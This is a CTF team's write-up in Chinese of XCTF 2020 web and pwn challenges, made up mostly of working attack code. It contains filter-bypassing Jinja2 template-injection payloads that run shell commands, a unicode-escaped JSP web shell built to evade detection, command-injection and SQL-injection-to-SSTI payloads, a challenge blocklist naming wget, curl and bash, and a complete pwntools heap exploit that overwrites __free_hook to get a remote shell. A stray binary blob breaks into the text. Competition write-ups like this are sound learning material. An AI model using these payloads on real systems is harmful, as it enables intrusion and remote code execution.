XCTF 2020 第一场 WriteUp - CNSS

XCTF高校网络安全专题挑战赛 Writeup - CNSS

Web

mine1_1

/success?msg=

模板注入

过滤了 ' " _ args []

request.cookies 绕过

{{()|attr(request.cookies.class)|attr(request.cookies.base)|attr(request.cookies.subclasses)()|attr(request.cookies.getitem)(59)|attr(request.cookies.init)|attr(request.cookies.globals)|attr(request.cookies.getitem)(request.cookies.linecache)|attr(request.cookies.dict)|attr(request.cookies.getitem)(request.cookies.os)|attr(request.cookies.dict)|attr(request.cookies.getitem)(request.cookies.popen)(request.cookies.cmd)|attr(request.cookies.read)()}}
Cookie: class=__class__; base=__base__; subclasses=__subclasses__; getitem=__getitem__; init=__init__; globals=__globals__; linecache=linecache; dict=__dict__; os=os; popen=popen; read=read; cmd=cat flag.txt

mine2

_ = '"{0:c}"|attr("fo"%2B"rmat")(95)'
g = '"{0:c}"|attr("fo"%2B"rmat")(103)'
u = '"{0:c}"|attr("fo"%2B"rmat")(117)'
blank = '"{0:c}"|attr("fo"%2B"rmat")(32)'
dot = '"{0:c}"|attr("fo"%2B"rmat")(46)'
add = "%2B"

def gen_str(s):
    s_code = []
    for i in s:
        if i == "_":
            s_code += [_]
        elif i == "g":
            s_code += [g]
        elif i == "u":
            s_code += [u]
        elif i == " ":
            s_code += [blank]
        elif i == ".":
            s_code += [dot]
        else:
            s_code += ['"' + i + '"']
    return add.join(s_code)

if __name__ == "__main__":
    print(gen_str("__class__"))
    print(gen_str("__base__"))
    print(gen_str("__subclasses__"))
    print(gen_str("__globals__"))
    print(gen_str("__getitem__"))
    print(gen_str("__init__"))
    print(gen_str("__dict__"))
    print(gen_str("cat flag.txt"))

{%print(""|attr("{0:c}"|attr("fo"%2B"rmat")(95)%2B"{0:c}"|attr("fo"%2B"rmat")(95)%2B"c"%2B"l"%2B"a"%2B"s"%2B"s"%2B"{0:c}"|attr("fo"%2B"rmat")(95)%2B"{0:c}"|attr("fo"%2B"rmat")(95))|attr("{0:c}"|attr("fo"%2B"rmat")(95)%2B"{0:c}"|attr("fo"%2B"rmat")(95)%2B"b"%2B"a"%2B"s"%2B"e"%2B"{0:c}"|attr("fo"%2B"rmat")(95)%2B"{0:c}"|attr("fo"%2B"rmat")(95))|attr("{0:c}"|attr("fo"%2B"rmat")(95)%2B"{0:c}"|attr("fo"%2B"rmat")(95)%2B"s"%2B"{0:c}"|attr("fo"%2B"rmat")(117)%2B"b"%2B"c"%2B"l"%2B"a"%2B"s"%2B"s"%2B"e"%2B"s"%2B"{0:c}"|attr("fo"%2B"rmat")(95)%2B"{0:c}"|attr("fo"%2B"rmat")(95))()|attr("{0:c}"|attr("fo"%2B"rmat")(95)%2B"{0:c}"|attr("fo"%2B"rmat")(95)%2B"{0:c}"|attr("fo"%2B"rmat")(103)%2B"e"%2B"t"%2B"i"%2B"t"%2B"e"%2B"m"%2B"{0:c}"|attr("fo"%2B"rmat")(95)%2B"{0:c}"|attr("fo"%2B"rmat")(95))(117)|attr("{0:c}"|attr("fo"%2B"rmat")(95)%2B"{0:c}"|attr("fo"%2B"rmat")(95)%2B"i"%2B"n"%2B"i"%2B"t"%2B"{0:c}"|attr("fo"%2B"rmat")(95)%2B"{0:c}"|attr("fo"%2B"rmat")(95))|attr("{0:c}"|attr("fo"%2B"rmat")(95)%2B"{0:c}"|attr("fo"%2B"rmat")(95)%2B"{0:c}"|attr("fo"%2B"rmat")(103)%2B"l"%2B"o"%2B"b"%2B"a"%2B"l"%2B"s"%2B"{0:c}"|attr("fo"%2B"rmat")(95)%2B"{0:c}"|attr("fo"%2B"rmat")(95))|attr("{0:c}"|attr("fo"%2B"rmat")(95)%2B"{0:c}"|attr("fo"%2B"rmat")(95)%2B"{0:c}"|attr("fo"%2B"rmat")(103)%2B"e"%2B"t"%2B"i"%2B"t"%2B"e"%2B"m"%2B"{0:c}"|attr("fo"%2B"rmat")(95)%2B"{0:c}"|attr("fo"%2B"rmat")(95))("popen")("c"%2B"a"%2B"t"%2B"{0:c}"|attr("fo"%2B"rmat")(32)%2B"f"%2B"l"%2B"a"%2B"{0:c}"|attr("fo"%2B"rmat")(103)%2B"{0:c}"|attr("fo"%2B"rmat")(46)%2B"t"%2B"x"%2B"t")|attr("read")())%}

webshell_1

Vue前端 jsp后端

Apache Tomcat/10.0.0-M10

POST /upload.jsp
body 为文件内容的 base64

jsp 免杀

unicode 绕过

<%java.io.InputStream input=Runtime.getRuntime().\\u0065\\u0078\\u0065\\u0063(request.getParameter("cmd")).getInputStream();int len=-1;byte[] bytes=new byte[4092];out.print("<pre>");while ((len = input.read(bytes)) != -1) {out.println(new String(bytes));out.print("</pre>");}%>

hids

cat$IFS$(find)

过滤规则

from flask import Flask
from flask import render_template,request
import subprocess,re
app = Flask(__name__)

@app.route('/',methods=['GET'])
def index():
    return render_template('index.html')

@app.route('/run',methods=['POST'])
def run():
    cmd = request.form.get("cmd")
    if re.search(r'''[^0-9a-zA-Z">\\\\\\$();]''',cmd):
        return 'Hacker!'
    if re.search(r'''ping|wget|curl|bash|perl|python|php|kill|ps''',cmd):
        return 'Hacker!'
    p = subprocess.Popen(cmd,stderr=subprocess.STDOUT, stdout=subprocess.PIPE,shell=True,close_fds=True)
    try:
        (msg, errs) = p.communicate(timeout=5)
        return msg
    except Exception as e:
        return 'Error!'

app.run(host='0.0.0.0',port='5000')Bud1	latesbw	templatesbwspblob�bplist00�	
		]ShowStatusBar_SidebarWidthTenElevenOrLater[ShowToolbar[ShowTabView_ContainerShowSidebar\\WindowBounds[ShowSidebar[ShowPathbar#@_@		_{{495, 419}, {770, 436}}	'FR^u�����������	templatesvSrnlong @� @� @� @E	DSDB `� @� @� @cat: ./web/templates: Is a directory

cmd=ls$IFS$(printf$IFS"\\56\\56\\57\\56\\56\\57")

readflag90s后才能读出flag

detect.py可写

改成空就可以了

然后readflag就出了

pyer

sql盲注

<test>
        <title>AND boolean-based blind - WHERE or HAVING clause</title>
        <stype>1</stype>
        <level>1</level>
        <risk>1</risk>
        <clause>1,8,9</clause>
        <where>1</where>
        <vector>1'or iif(1=([INFERENCE]),1,randomblob(10000000000000))-- -</vector>
        <request>
            <payload>1'or iif(1=1,1,randomblob(10000000000000))-- -</payload>
        </request>
        <response>
            <comparison>1'or iif(1=0,1,randomblob(10000000000000))-- -</comparison>
        </response>
</test>
POST /login HTTP/1.1
Host: 121.37.172.67:30891
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:83.0) Gecko/20100101 Firefox/83.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 55
Origin: <http://121.37.172.67:30891>
Connection: close
Referer: <http://121.37.172.67:30891/login>
Upgrade-Insecure-Requests: 1

username=aaa&password=admin&submit=%E7%99%BB%E9%99%86
python3 sqlmap.py -l ~/ctf/huawei_ctf/web3/sqlite.txt --random-agent --dbms=SQLite -p username --tables
users 表
	username:admin password:sqlite_not_safe
comment 表
	username:guest comment:you are so good
username=a'%20union%20select%20'{{[].__class__.__base__.__subclasses__()[117].__init__.__globals__["popen"]("cat%20flag.txt").read()}}'--%20
username='+union+select+'{{[].__class__.__mro__[1].__subclasses__()[201].__init__.__globals__["__builtins__"]["__import__"]("os").popen("cat flag.txt").read()}}'+--+&submit=%E7%99%BB%E9%99%86

Pwn

cpp

保护全开

只有两个功能，添加堆块以及删除堆块

程序有一个 UAF，会在删除堆块后将其内容打印出来，然后让你在 free 掉的地方写东西

from pwn import *
from time import sleep
import sys
context.log_level = 'DEBUG'

ver = '2.31'
elf_dir = './chall'
#ld_dir = '/glibc/x64/{0}/lib/ld-{0}.so'.format(ver)

libc_dir = './libc-2.31.so'
#libc_dir = "/glibc/x64/{0}/lib/libc-{0}.so".format(ver)

if(len(sys.argv) == 1):
    p = process(elf_dir)
    #p = process([elf_dir],env={"LD_PRELOAD": libc_dir})
    
    #p = process([ld_dir, elf_dir], env={"LD_PRELOAD": libc_dir})
else:
    p = remote('124.70.12.210', 10002)

def add(idx, data):
    p.sendlineafter('> ', '0')
    p.sendlineafter('> ', data)
    p.sendlineafter('> ', str(idx))

def change_bytes(idx, data, need = False):
    p.sendlineafter('> ', '1')
    p.sendlineafter('> ', str(idx))
    if need == True:
        ret = p.recvuntil('> ')[:-3]
        p.sendline(data)
        return ret
    else:
        p.sendlineafter('> ', data)

def change_byte(idx, need = False):
    p.sendlineafter('> ', '1')
    p.sendlineafter('> ', str(idx))
    if need == True:
        ret = p.recvuntil('> ')[:-3]
        p.send(b'\\n')
        return ret
    else:
        p.sendafter('> ', b'\\n')

# leak heap
# -----------------------

add(0x0, b'\\x00'*6)
add(0x1, b'\\x00'*6)
add(0x2, b'\\x00'*6)

change_bytes(0x1, b'\\x00'*6)
ret = change_byte(0x0, True)
heap = u64(ret+b'\\x00\\x00') - 0x30
success('heap: ' + hex(heap))
add(0xff, b'\\xff'*6)
add(0xfe, b'\\xff'*6)

# leak libc
# -----------------------

add(0x0, b'\\x2f'*6)
add(0x1, b'\\x22'*6)
add(0x2, b'\\x22'*6)
add(0xd0, b'\\x22'*6)

change_bytes(0x2, b'\\x00'*6)
change_bytes(0x1, p64(heap+0x68)[:-2])
add(0xfd, b'\\xee'*6)
add(0xfc, p64(0x441)[:-2])

for i in range(36):
    add(0x60+i, b'\\xdd'*6)

add(0x10, b'\\x33'*6)
add(0x11, b'\\x33'*6)
add(0x12, b'\\x44'*6)
add(0x13, b'\\x44'*6)
add(0x14, b'\\x55'*6)
add(0x15, b'\\x55'*6)
add(0x16, b'\\x66'*6)

# prepare binsh
p.sendlineafter('> ', '0')
p.sendlineafter('> ', b'/bin/sh')
p.sendlineafter('> ', str(0x99))

#pause()

ret = change_byte(0x0, True)

libc = ELF(libc_dir)
libc_base = u64(ret+b'\\x00\\x00') - 0x10 - 96 - libc.sym['__malloc_hook']
free_hook = libc_base + libc.sym['__free_hook']
system = libc_base + libc.symbols['system']
main_arena = libc_base + libc.symbols['__malloc_hook'] + 0x10
success("libc_base: " + hex(libc_base))
success("free_hook: " + hex(free_hook))
success("system: " + hex(system))
success("main_arena: " + hex(main_arena))

# fix unsorted bin
# -----------------------
#gdb.attach(p, 'b *$rebase(0x13C6)\\nc')

change_bytes(0x11, b'\\x00'*6)
change_bytes(0x10, p64(main_arena+112)[:-2])
add(0x20, p64(0xdeadbeef)[:-2])
add(0x21, p64(main_arena+96)[:-2])

# modify free_hook 
# -----------------------
change_bytes(0x12, b'\\x00'*6)
change_bytes(0x13, p64(main_arena+112+8)[:-2])
add(0x22, p64(0xdeadbeef)[:-2])
add(0x23, p64(main_arena+96)[:-2])

change_bytes(0x14, b'\\x00'*6)
change_bytes(0x15, p64(free_hook)[:-2])
add(0x24, p64(0xdeadbeef)[:-2])
add(0x25, p64(system)[:-2])

# trigger system("/bin/sh")
# -----------------------

p.sendlineafter('> ', '1')
p.sendlineafter('> ', str(99))

p.interactive()